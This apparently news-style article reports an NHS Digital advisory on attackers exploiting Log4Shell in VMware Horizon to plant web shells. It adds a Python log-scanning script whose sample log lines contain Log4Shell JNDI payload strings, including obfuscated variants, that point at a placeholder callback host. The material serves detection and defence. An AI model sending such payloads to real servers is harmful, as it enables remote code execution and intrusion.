NHS Warns of Attackers Targeting Log4j Flaws in VMware Horizon

Published: 23/11/2024   Category: security




An unknown threat group has been observed attacking VMware Horizon servers running versions with Log4j vulnerabilities.



The UK's National Health Service (NHS) Digital has issued an advisory warning of attackers actively targeting Log4j vulnerability CVE-2021-44228 in VMware Horizon servers to establish persistence.
Officials say the threat group is unknown. The observed attacks target the Log4j vulnerability in the Apache Tomcat service, which is embedded within VMware Horizon.
Their attack activity likely contains a reconnaissance phase, in which they use the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure, the NHS wrote in its advisory.
Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service, officials explained.
The attacker could then use this web shell to conduct malicious actions such as deploying more malware, exfiltrating data, or launching a ransomware attack. In the advisory, the NHS noted more VMware systems may be vulnerable and companies should review the VMSA-2021-0028 security advisory: VMware Response to Apache Log4j Remote Code Execution Vulnerability.
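The reconnaissance phase described above leaves JNDI lookup strings in request logs. As an added example (not taken from the NHS advisory or from VMware), the following Python script flags such strings in constructed access-log lines, including URL-encoded and nested-lookup forms, and extracts the callback host for review; the log format, sample hosts and function names are assumptions.

```python
import re
from urllib.parse import unquote

# Nested Log4j lookups that collapse to a literal: ${lower:X}, ${upper:X}, ${prefix:-X}
_SIMPLE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# JNDI lookup with a remote-capable scheme; group 2 is the callback host[:port]
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop)://([^/\s}]+)", re.I)


def normalize(text, rounds=5):
    """URL-decode and collapse nested lookups so obfuscated lookups still match."""
    for _ in range(rounds):
        new = unquote(text)
        new = _SIMPLE.sub(r"\1", new)
        new = _DEFAULT.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def find_jndi_callbacks(lines):
    """Return (line_number, scheme, host) for each JNDI lookup found in the lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(line)):
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits


# Constructed sample access-log lines (hosts use the reserved .invalid TLD).
SAMPLE = [
    '10.0.0.5 - - [05/Jan/2022:10:00:01] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jan/2022:10:00:07] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://cb.example.invalid:1389/a}"',
    '10.0.0.9 - - [05/Jan/2022:10:00:09] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcb.example.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "-"',
    '10.0.0.9 - - [05/Jan/2022:10:00:12] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://cb.example.invalid/a}"',
]

if __name__ == "__main__":
    for hit in find_jndi_callbacks(SAMPLE):
        print(hit)
```

A hit shows only that a lookup string reached the server; whether the host then made an outbound LDAP connection to the extracted callback address has to be confirmed from egress or firewall logs.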
